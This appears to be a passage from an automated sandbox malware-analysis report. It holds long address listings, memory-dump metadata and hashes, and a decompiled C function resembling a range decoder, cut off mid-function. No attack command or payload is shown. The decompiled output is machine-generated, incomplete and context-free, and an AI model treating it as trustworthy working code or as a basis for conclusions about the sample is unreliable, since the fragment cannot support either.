                                                                                                                                                                                                                            0x004070c5
                                                                                                                                                                                                                            0x004070c5
                                                                                                                                                                                                                            0x004070c8
                                                                                                                                                                                                                            0x004070cc
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0040711c
                                                                                                                                                                                                                            0x00407120
                                                                                                                                                                                                                            0x00407127
                                                                                                                                                                                                                            0x0040712a
                                                                                                                                                                                                                            0x0040712d
                                                                                                                                                                                                                            0x00407137
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407137
                                                                                                                                                                                                                            0x00407122
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407143
                                                                                                                                                                                                                            0x00407147
                                                                                                                                                                                                                            0x0040714e
                                                                                                                                                                                                                            0x00407151
                                                                                                                                                                                                                            0x00407154
                                                                                                                                                                                                                            0x00407149
                                                                                                                                                                                                                            0x00407149
                                                                                                                                                                                                                            0x00407149
                                                                                                                                                                                                                            0x00407157
                                                                                                                                                                                                                            0x0040715a
                                                                                                                                                                                                                            0x0040715d
                                                                                                                                                                                                                            0x0040715d
                                                                                                                                                                                                                            0x00407160
                                                                                                                                                                                                                            0x00407163
                                                                                                                                                                                                                            0x00407166
                                                                                                                                                                                                                            0x00407166
                                                                                                                                                                                                                            0x00407169
                                                                                                                                                                                                                            0x00407170
                                                                                                                                                                                                                            0x00407175
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407203
                                                                                                                                                                                                                            0x00407203
                                                                                                                                                                                                                            0x00407207
                                                                                                                                                                                                                            0x004075a5
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004075a5
                                                                                                                                                                                                                            0x0040720d
                                                                                                                                                                                                                            0x00407210
                                                                                                                                                                                                                            0x00407213
                                                                                                                                                                                                                            0x00407217
                                                                                                                                                                                                                            0x0040721a
                                                                                                                                                                                                                            0x00407220
                                                                                                                                                                                                                            0x00407222
                                                                                                                                                                                                                            0x00407222
                                                                                                                                                                                                                            0x00407222
                                                                                                                                                                                                                            0x00407225
                                                                                                                                                                                                                            0x00407228
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406df8
                                                                                                                                                                                                                            0x00406df8
                                                                                                                                                                                                                            0x00406dfc
                                                                                                                                                                                                                            0x00407569
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407569
                                                                                                                                                                                                                            0x00406e02
                                                                                                                                                                                                                            0x00406e05
                                                                                                                                                                                                                            0x00406e08
                                                                                                                                                                                                                            0x00406e0c
                                                                                                                                                                                                                            0x00406e0f
                                                                                                                                                                                                                            0x00406e15
                                                                                                                                                                                                                            0x00406e17
                                                                                                                                                                                                                            0x00406e17
                                                                                                                                                                                                                            0x00406e17
                                                                                                                                                                                                                            0x00406e1a
                                                                                                                                                                                                                            0x00406e1d
                                                                                                                                                                                                                            0x00406e1d
                                                                                                                                                                                                                            0x00406e20
                                                                                                                                                                                                                            0x00406e23
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406e29
                                                                                                                                                                                                                            0x00406e2f
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406e35
                                                                                                                                                                                                                            0x00406e35
                                                                                                                                                                                                                            0x00406e39
                                                                                                                                                                                                                            0x00406e3c
                                                                                                                                                                                                                            0x00406e3f
                                                                                                                                                                                                                            0x00406e42
                                                                                                                                                                                                                            0x00406e45
                                                                                                                                                                                                                            0x00406e46
                                                                                                                                                                                                                            0x00406e49
                                                                                                                                                                                                                            0x00406e4b
                                                                                                                                                                                                                            0x00406e51
                                                                                                                                                                                                                            0x00406e54
                                                                                                                                                                                                                            0x00406e57
                                                                                                                                                                                                                            0x00406e5a
                                                                                                                                                                                                                            0x00406e5d
                                                                                                                                                                                                                            0x00406e60
                                                                                                                                                                                                                            0x00406e63
                                                                                                                                                                                                                            0x00406e7f
                                                                                                                                                                                                                            0x00406e82
                                                                                                                                                                                                                            0x00406e85
                                                                                                                                                                                                                            0x00406e88
                                                                                                                                                                                                                            0x00406e8f
                                                                                                                                                                                                                            0x00406e93
                                                                                                                                                                                                                            0x00406e95
                                                                                                                                                                                                                            0x00406e99
                                                                                                                                                                                                                            0x00406e65
                                                                                                                                                                                                                            0x00406e65
                                                                                                                                                                                                                            0x00406e69
                                                                                                                                                                                                                            0x00406e71
                                                                                                                                                                                                                            0x00406e76
                                                                                                                                                                                                                            0x00406e78
                                                                                                                                                                                                                            0x00406e7a
                                                                                                                                                                                                                            0x00406e7a
                                                                                                                                                                                                                            0x00406e9c
                                                                                                                                                                                                                            0x00406ea3
                                                                                                                                                                                                                            0x00406ea6
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406eac
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406eac
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406eb1
                                                                                                                                                                                                                            0x00406eb1
                                                                                                                                                                                                                            0x00406eb5
                                                                                                                                                                                                                            0x00407575
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407575
                                                                                                                                                                                                                            0x00406ebb
                                                                                                                                                                                                                            0x00406ebe
                                                                                                                                                                                                                            0x00406ec1
                                                                                                                                                                                                                            0x00406ec5
                                                                                                                                                                                                                            0x00406ec8
                                                                                                                                                                                                                            0x00406ece
                                                                                                                                                                                                                            0x00406ed0
                                                                                                                                                                                                                            0x00406ed0
                                                                                                                                                                                                                            0x00406ed0
                                                                                                                                                                                                                            0x00406ed3
                                                                                                                                                                                                                            0x00406ed6
                                                                                                                                                                                                                            0x00406ed6
                                                                                                                                                                                                                            0x00406ed6
                                                                                                                                                                                                                            0x00406edc
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406ede
                                                                                                                                                                                                                            0x00406ee1
                                                                                                                                                                                                                            0x00406ee4
                                                                                                                                                                                                                            0x00406ee7
                                                                                                                                                                                                                            0x00406eea
                                                                                                                                                                                                                            0x00406eed
                                                                                                                                                                                                                            0x00406ef0
                                                                                                                                                                                                                            0x00406ef3
                                                                                                                                                                                                                            0x00406ef6
                                                                                                                                                                                                                            0x00406ef9
                                                                                                                                                                                                                            0x00406efc
                                                                                                                                                                                                                            0x00406f14
                                                                                                                                                                                                                            0x00406f17
                                                                                                                                                                                                                            0x00406f1a
                                                                                                                                                                                                                            0x00406f1d
                                                                                                                                                                                                                            0x00406f1d
                                                                                                                                                                                                                            0x00406f20
                                                                                                                                                                                                                            0x00406f24
                                                                                                                                                                                                                            0x00406f26
                                                                                                                                                                                                                            0x00406efe
                                                                                                                                                                                                                            0x00406efe
                                                                                                                                                                                                                            0x00406f06
                                                                                                                                                                                                                            0x00406f0b
                                                                                                                                                                                                                            0x00406f0d
                                                                                                                                                                                                                            0x00406f0f
                                                                                                                                                                                                                            0x00406f0f
                                                                                                                                                                                                                            0x00406f29
                                                                                                                                                                                                                            0x00406f30
                                                                                                                                                                                                                            0x00406f33
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406f35
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406f35
                                                                                                                                                                                                                            0x00406f33
                                                                                                                                                                                                                            0x00406f3a
                                                                                                                                                                                                                            0x00406f3a
                                                                                                                                                                                                                            0x00406f3a
                                                                                                                                                                                                                            0x00406f3a
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406f75
                                                                                                                                                                                                                            0x00406f75
                                                                                                                                                                                                                            0x00406f79
                                                                                                                                                                                                                            0x00407581
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407581
                                                                                                                                                                                                                            0x00406f7f
                                                                                                                                                                                                                            0x00406f82
                                                                                                                                                                                                                            0x00406f85
                                                                                                                                                                                                                            0x00406f89
                                                                                                                                                                                                                            0x00406f8c
                                                                                                                                                                                                                            0x00406f92
                                                                                                                                                                                                                            0x00406f94
                                                                                                                                                                                                                            0x00406f94
                                                                                                                                                                                                                            0x00406f94
                                                                                                                                                                                                                            0x00406f97
                                                                                                                                                                                                                            0x00406f9a
                                                                                                                                                                                                                            0x00406f9a
                                                                                                                                                                                                                            0x00406fa0
                                                                                                                                                                                                                            0x00406f3e
                                                                                                                                                                                                                            0x00406f3e
                                                                                                                                                                                                                            0x00406f41
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406f41
                                                                                                                                                                                                                            0x00406fa2
                                                                                                                                                                                                                            0x00406fa2
                                                                                                                                                                                                                            0x00406fa5
                                                                                                                                                                                                                            0x00406fa8
                                                                                                                                                                                                                            0x00406fab
                                                                                                                                                                                                                            0x00406fae
                                                                                                                                                                                                                            0x00406fb1
                                                                                                                                                                                                                            0x00406fb4
                                                                                                                                                                                                                            0x00406fb7
                                                                                                                                                                                                                            0x00406fba
                                                                                                                                                                                                                            0x00406fbd
                                                                                                                                                                                                                            0x00406fc0
                                                                                                                                                                                                                            0x00406fd8
                                                                                                                                                                                                                            0x00406fdb
                                                                                                                                                                                                                            0x00406fde
                                                                                                                                                                                                                            0x00406fe1
                                                                                                                                                                                                                            0x00406fe1
                                                                                                                                                                                                                            0x00406fe4
                                                                                                                                                                                                                            0x00406fe8
                                                                                                                                                                                                                            0x00406fea
                                                                                                                                                                                                                            0x00406fc2
                                                                                                                                                                                                                            0x00406fc2
                                                                                                                                                                                                                            0x00406fca
                                                                                                                                                                                                                            0x00406fcf
                                                                                                                                                                                                                            0x00406fd1
                                                                                                                                                                                                                            0x00406fd3
                                                                                                                                                                                                                            0x00406fd3
                                                                                                                                                                                                                            0x00406fed
                                                                                                                                                                                                                            0x00406ff4
                                                                                                                                                                                                                            0x00406ff7
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406ff9
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406ff9
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407286
                                                                                                                                                                                                                            0x00407286
                                                                                                                                                                                                                            0x0040728a
                                                                                                                                                                                                                            0x004075b1
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004075b1
                                                                                                                                                                                                                            0x00407290
                                                                                                                                                                                                                            0x00407293
                                                                                                                                                                                                                            0x00407296
                                                                                                                                                                                                                            0x0040729a
                                                                                                                                                                                                                            0x0040729d
                                                                                                                                                                                                                            0x004072a3
                                                                                                                                                                                                                            0x004072a5
                                                                                                                                                                                                                            0x004072a5
                                                                                                                                                                                                                            0x004072a5
                                                                                                                                                                                                                            0x004072a8
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407056
                                                                                                                                                                                                                            0x00407056
                                                                                                                                                                                                                            0x00407059
                                                                                                                                                                                                                            0x004073cb
                                                                                                                                                                                                                            0x004073cb
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407452
                                                                                                                                                                                                                            0x00407456
                                                                                                                                                                                                                            0x00407474
                                                                                                                                                                                                                            0x00407474
                                                                                                                                                                                                                            0x00407474
                                                                                                                                                                                                                            0x0040747b
                                                                                                                                                                                                                            0x00407482
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407482
                                                                                                                                                                                                                            0x00407458
                                                                                                                                                                                                                            0x0040745b
                                                                                                                                                                                                                            0x0040745e
                                                                                                                                                                                                                            0x00407461
                                                                                                                                                                                                                            0x00407468
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407543
                                                                                                                                                                                                                            0x00407546
                                                                                                                                                                                                                            0x00407447
                                                                                                                                                                                                                            0x00407447
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0040717d
                                                                                                                                                                                                                            0x0040717f
                                                                                                                                                                                                                            0x00407186
                                                                                                                                                                                                                            0x00407187
                                                                                                                                                                                                                            0x00407189
                                                                                                                                                                                                                            0x0040718c
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407194
                                                                                                                                                                                                                            0x00407197
                                                                                                                                                                                                                            0x0040719a
                                                                                                                                                                                                                            0x0040719c
                                                                                                                                                                                                                            0x0040719e
                                                                                                                                                                                                                            0x0040719e
                                                                                                                                                                                                                            0x0040719f
                                                                                                                                                                                                                            0x004071a2
                                                                                                                                                                                                                            0x004071a9
                                                                                                                                                                                                                            0x004071ac
                                                                                                                                                                                                                            0x004071ba
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0040749f
                                                                                                                                                                                                                            0x0040749f
                                                                                                                                                                                                                            0x004074a3
                                                                                                                                                                                                                            0x004075db
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004075db
                                                                                                                                                                                                                            0x004074a9
                                                                                                                                                                                                                            0x004074ac
                                                                                                                                                                                                                            0x004074af
                                                                                                                                                                                                                            0x004074b3
                                                                                                                                                                                                                            0x004074b6
                                                                                                                                                                                                                            0x004074bc
                                                                                                                                                                                                                            0x004074be
                                                                                                                                                                                                                            0x004074be
                                                                                                                                                                                                                            0x004074be
                                                                                                                                                                                                                            0x004074c1
                                                                                                                                                                                                                            0x004074c4
                                                                                                                                                                                                                            0x004074c4
                                                                                                                                                                                                                            0x004074c4
                                                                                                                                                                                                                            0x004074c4
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004071c2
                                                                                                                                                                                                                            0x004071c5
                                                                                                                                                                                                                            0x004071fb
                                                                                                                                                                                                                            0x0040732b
                                                                                                                                                                                                                            0x0040732b
                                                                                                                                                                                                                            0x0040732b
                                                                                                                                                                                                                            0x0040732b
                                                                                                                                                                                                                            0x0040732e
                                                                                                                                                                                                                            0x0040732e
                                                                                                                                                                                                                            0x00407331
                                                                                                                                                                                                                            0x00407333
                                                                                                                                                                                                                            0x004075bd
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004075bd
                                                                                                                                                                                                                            0x00407339
                                                                                                                                                                                                                            0x0040733c
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407342
                                                                                                                                                                                                                            0x00407346
                                                                                                                                                                                                                            0x00407349
                                                                                                                                                                                                                            0x00407349
                                                                                                                                                                                                                            0x00407349
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407349
                                                                                                                                                                                                                            0x004071c7
                                                                                                                                                                                                                            0x004071c9
                                                                                                                                                                                                                            0x004071cb
                                                                                                                                                                                                                            0x004071cd
                                                                                                                                                                                                                            0x004071d0
                                                                                                                                                                                                                            0x004071d1
                                                                                                                                                                                                                            0x004071d3
                                                                                                                                                                                                                            0x004071d5
                                                                                                                                                                                                                            0x004071d8
                                                                                                                                                                                                                            0x004071db
                                                                                                                                                                                                                            0x004071f1
                                                                                                                                                                                                                            0x004071f6
                                                                                                                                                                                                                            0x0040722e
                                                                                                                                                                                                                            0x0040722e
                                                                                                                                                                                                                            0x00407232
                                                                                                                                                                                                                            0x0040725e
                                                                                                                                                                                                                            0x00407260
                                                                                                                                                                                                                            0x00407267
                                                                                                                                                                                                                            0x0040726a
                                                                                                                                                                                                                            0x0040726d
                                                                                                                                                                                                                            0x0040726d
                                                                                                                                                                                                                            0x00407272
                                                                                                                                                                                                                            0x00407272
                                                                                                                                                                                                                            0x00407274
                                                                                                                                                                                                                            0x00407277
                                                                                                                                                                                                                            0x0040727e
                                                                                                                                                                                                                            0x00407281
                                                                                                                                                                                                                            0x004072ae
                                                                                                                                                                                                                            0x004072ae
                                                                                                                                                                                                                            0x004072b1
                                                                                                                                                                                                                            0x004072b4
                                                                                                                                                                                                                            0x00407328
                                                                                                                                                                                                                            0x00407328
                                                                                                                                                                                                                            0x00407328
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407328
                                                                                                                                                                                                                            0x004072b6
                                                                                                                                                                                                                            0x004072bc
                                                                                                                                                                                                                            0x004072bf
                                                                                                                                                                                                                            0x004072c2
                                                                                                                                                                                                                            0x004072c5
                                                                                                                                                                                                                            0x004072c8
                                                                                                                                                                                                                            0x004072cb
                                                                                                                                                                                                                            0x004072ce
                                                                                                                                                                                                                            0x004072d1
                                                                                                                                                                                                                            0x004072d4
                                                                                                                                                                                                                            0x004072d7
                                                                                                                                                                                                                            0x004072f0
                                                                                                                                                                                                                            0x004072f2
                                                                                                                                                                                                                            0x004072f5
                                                                                                                                                                                                                            0x004072f6
                                                                                                                                                                                                                            0x004072f9
                                                                                                                                                                                                                            0x004072fb
                                                                                                                                                                                                                            0x004072fe
                                                                                                                                                                                                                            0x00407300
                                                                                                                                                                                                                            0x00407302
                                                                                                                                                                                                                            0x00407305
                                                                                                                                                                                                                            0x00407307
                                                                                                                                                                                                                            0x0040730a
                                                                                                                                                                                                                            0x0040730e
                                                                                                                                                                                                                            0x00407310
                                                                                                                                                                                                                            0x00407310
                                                                                                                                                                                                                            0x00407311
                                                                                                                                                                                                                            0x00407314
                                                                                                                                                                                                                            0x00407317
                                                                                                                                                                                                                            0x004072d9
                                                                                                                                                                                                                            0x004072d9
                                                                                                                                                                                                                            0x004072e1
                                                                                                                                                                                                                            0x004072e6
                                                                                                                                                                                                                            0x004072e8
                                                                                                                                                                                                                            0x004072eb
                                                                                                                                                                                                                            0x004072eb
                                                                                                                                                                                                                            0x0040731a
                                                                                                                                                                                                                            0x00407321
                                                                                                                                                                                                                            0x004072ab
                                                                                                                                                                                                                            0x004072ab
                                                                                                                                                                                                                            0x004072ab
                                                                                                                                                                                                                            0x004072ab
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407323
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407323
                                                                                                                                                                                                                            0x00407321
                                                                                                                                                                                                                            0x00407234
                                                                                                                                                                                                                            0x00407237
                                                                                                                                                                                                                            0x00407239
                                                                                                                                                                                                                            0x0040723c
                                                                                                                                                                                                                            0x0040723f
                                                                                                                                                                                                                            0x00407242
                                                                                                                                                                                                                            0x00407244
                                                                                                                                                                                                                            0x00407247
                                                                                                                                                                                                                            0x0040724a
                                                                                                                                                                                                                            0x0040724a
                                                                                                                                                                                                                            0x0040724d
                                                                                                                                                                                                                            0x0040724d
                                                                                                                                                                                                                            0x00407250
                                                                                                                                                                                                                            0x00407257
                                                                                                                                                                                                                            0x0040722b
                                                                                                                                                                                                                            0x0040722b
                                                                                                                                                                                                                            0x0040722b
                                                                                                                                                                                                                            0x0040722b
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407259
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407259
                                                                                                                                                                                                                            0x00407257
                                                                                                                                                                                                                            0x004071dd
                                                                                                                                                                                                                            0x004071e0
                                                                                                                                                                                                                            0x004071e2
                                                                                                                                                                                                                            0x004071e5
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406f44
                                                                                                                                                                                                                            0x00406f44
                                                                                                                                                                                                                            0x00406f48
                                                                                                                                                                                                                            0x0040758d
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0040758d
                                                                                                                                                                                                                            0x00406f4e
                                                                                                                                                                                                                            0x00406f51
                                                                                                                                                                                                                            0x00406f54
                                                                                                                                                                                                                            0x00406f57
                                                                                                                                                                                                                            0x00406f5a
                                                                                                                                                                                                                            0x00406f5d
                                                                                                                                                                                                                            0x00406f60
                                                                                                                                                                                                                            0x00406f62
                                                                                                                                                                                                                            0x00406f65
                                                                                                                                                                                                                            0x00406f68
                                                                                                                                                                                                                            0x00406f6b
                                                                                                                                                                                                                            0x00406f6d
                                                                                                                                                                                                                            0x00406f6d
                                                                                                                                                                                                                            0x00406f6d
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004070cf
                                                                                                                                                                                                                            0x004070cf
                                                                                                                                                                                                                            0x004070d3
                                                                                                                                                                                                                            0x00407599
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407599
                                                                                                                                                                                                                            0x004070d9
                                                                                                                                                                                                                            0x004070dc
                                                                                                                                                                                                                            0x004070df
                                                                                                                                                                                                                            0x004070e2
                                                                                                                                                                                                                            0x004070e4
                                                                                                                                                                                                                            0x004070e4
                                                                                                                                                                                                                            0x004070e4
                                                                                                                                                                                                                            0x004070e7
                                                                                                                                                                                                                            0x004070ea
                                                                                                                                                                                                                            0x004070ed
                                                                                                                                                                                                                            0x004070f0
                                                                                                                                                                                                                            0x004070f3
                                                                                                                                                                                                                            0x004070f6
                                                                                                                                                                                                                            0x004070f7
                                                                                                                                                                                                                            0x004070f9
                                                                                                                                                                                                                            0x004070f9
                                                                                                                                                                                                                            0x004070f9
                                                                                                                                                                                                                            0x004070fc
                                                                                                                                                                                                                            0x004070ff
                                                                                                                                                                                                                            0x00407102
                                                                                                                                                                                                                            0x00407105
                                                                                                                                                                                                                            0x00407105
                                                                                                                                                                                                                            0x00407105
                                                                                                                                                                                                                            0x00407108
                                                                                                                                                                                                                            0x0040710a
                                                                                                                                                                                                                            0x0040710a
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0040734c
                                                                                                                                                                                                                            0x0040734c
                                                                                                                                                                                                                            0x0040734c
                                                                                                                                                                                                                            0x00407350
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407356
                                                                                                                                                                                                                            0x00407359
                                                                                                                                                                                                                            0x0040735c
                                                                                                                                                                                                                            0x0040735f
                                                                                                                                                                                                                            0x00407361
                                                                                                                                                                                                                            0x00407361
                                                                                                                                                                                                                            0x00407361
                                                                                                                                                                                                                            0x00407364
                                                                                                                                                                                                                            0x00407367
                                                                                                                                                                                                                            0x0040736a
                                                                                                                                                                                                                            0x0040736d
                                                                                                                                                                                                                            0x00407370
                                                                                                                                                                                                                            0x00407373
                                                                                                                                                                                                                            0x00407374
                                                                                                                                                                                                                            0x00407376
                                                                                                                                                                                                                            0x00407376
                                                                                                                                                                                                                            0x00407376
                                                                                                                                                                                                                            0x00407379
                                                                                                                                                                                                                            0x0040737c
                                                                                                                                                                                                                            0x0040737f
                                                                                                                                                                                                                            0x00407382
                                                                                                                                                                                                                            0x00407385
                                                                                                                                                                                                                            0x00407389
                                                                                                                                                                                                                            0x0040738b
                                                                                                                                                                                                                            0x0040738e
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407390
                                                                                                                                                                                                                            0x0040710d
                                                                                                                                                                                                                            0x0040710d
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x0040710d
                                                                                                                                                                                                                            0x0040738e
                                                                                                                                                                                                                            0x004075c3
                                                                                                                                                                                                                            0x004075e5
                                                                                                                                                                                                                            0x004075eb
                                                                                                                                                                                                                            0x004075ed
                                                                                                                                                                                                                            0x004075f4
                                                                                                                                                                                                                            0x004075f6
                                                                                                                                                                                                                            0x004075fd
                                                                                                                                                                                                                            0x00407601
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00406bf2
                                                                                                                                                                                                                            0x004075fa
                                                                                                                                                                                                                            0x004075fa
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x004075fa
                                                                                                                                                                                                                            0x00407447
                                                                                                                                                                                                                            0x004074cd
                                                                                                                                                                                                                            0x004074d3
                                                                                                                                                                                                                            0x004074d6
                                                                                                                                                                                                                            0x004074d9
                                                                                                                                                                                                                            0x004074dc
                                                                                                                                                                                                                            0x004074df
                                                                                                                                                                                                                            0x004074e2
                                                                                                                                                                                                                            0x004074e5
                                                                                                                                                                                                                            0x004074e8
                                                                                                                                                                                                                            0x004074ee
                                                                                                                                                                                                                            0x00407507
                                                                                                                                                                                                                            0x0040750a
                                                                                                                                                                                                                            0x0040750d
                                                                                                                                                                                                                            0x00407510
                                                                                                                                                                                                                            0x00407514
                                                                                                                                                                                                                            0x00407516
                                                                                                                                                                                                                            0x00407517
                                                                                                                                                                                                                            0x0040751a
                                                                                                                                                                                                                            0x004074f0
                                                                                                                                                                                                                            0x004074f0
                                                                                                                                                                                                                            0x004074f8
                                                                                                                                                                                                                            0x004074fd
                                                                                                                                                                                                                            0x004074ff
                                                                                                                                                                                                                            0x00407502
                                                                                                                                                                                                                            0x00407502
                                                                                                                                                                                                                            0x00407524
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407526
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407526
                                                                                                                                                                                                                            0x00407524
                                                                                                                                                                                                                            0x00000000
                                                                                                                                                                                                                            0x00407399

                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                            • Source File: 00000007.00000002.531367159.0000000000401000.00000020.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531329224.0000000000400000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531503317.0000000000408000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531563073.000000000040A000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531808710.0000000000422000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531838733.0000000000427000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531879279.0000000000435000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            • Associated: 00000007.00000002.531979945.000000000046B000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                            • Snapshot File: hcaresult_7_2_400000_UNK_.jbxd
                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                            • Opcode ID: 97748a737734167d5846b9d8dd4738ada3f75d0b833fdafa89234df63502b4a5
                                                                                                                                                                                                                            • Instruction ID: d49815ad38d406b3cd0a1a90ea7be1526168d9e39684835ffa6a026ef1ef4849
                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 97748a737734167d5846b9d8dd4738ada3f75d0b833fdafa89234df63502b4a5
                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 91913270D04228DBEF28CF98C8547ADBBB1FF44305F14816AD856BB281D778A986DF45
                                                                                                                                                                                                                            Uniqueness

                                                                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                                                                            Function 004070AB Relevance: 5.2, APIs: 4, Instructions: 205COMMON
                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                            C-Code - Quality: 98%
                                                                                                                                                                                                                            			E004070AB() {
				unsigned short _t532;
				signed int _t533;
				void _t534;
				void* _t535;
				signed int _t536;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						L89:
						 *((intOrPtr*)(_t613 - 0x80)) = 0x15;
						 *(_t613 - 0x58) =  *(_t613 - 4) + 0xa68;
						L69:
						_t606 =  *(_t613 - 0x58);
						 *(_t613 - 0x84) = 0x12;
						L132:
						 *(_t613 - 0x54) = _t606;
						L133:
						_t532 =  *_t606;
						_t589 = _t532 & 0x0000ffff;
						_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
						if( *(_t613 - 0xc) >= _t565) {
							 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
							 *(_t613 - 0x40) = 1;
							_t533 = _t532 - (_t532 >> 5);
							 *_t606 = _t533;
						} else {
							 *(_t613 - 0x10) = _t565;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
							 *_t606 = (0x800 - _t589 >> 5) + _t532;
						}
						if( *(_t613 - 0x10) >= 0x1000000) {
							L139:
							_t534 =  *(_t613 - 0x84);
							L140:
							 *(_t613 - 0x88) = _t534;
							goto L1;
						} else {
							L137:
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 5;
								goto L170;
							}
							 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						if( *(__ebp - 0x60) == 0) {
							L171:
							_t536 = _t535 | 0xffffffff;
							L172:
							return _t536;
						}
						__eax = 0;
						_t258 =  *(__ebp - 0x38) - 7 >= 0;
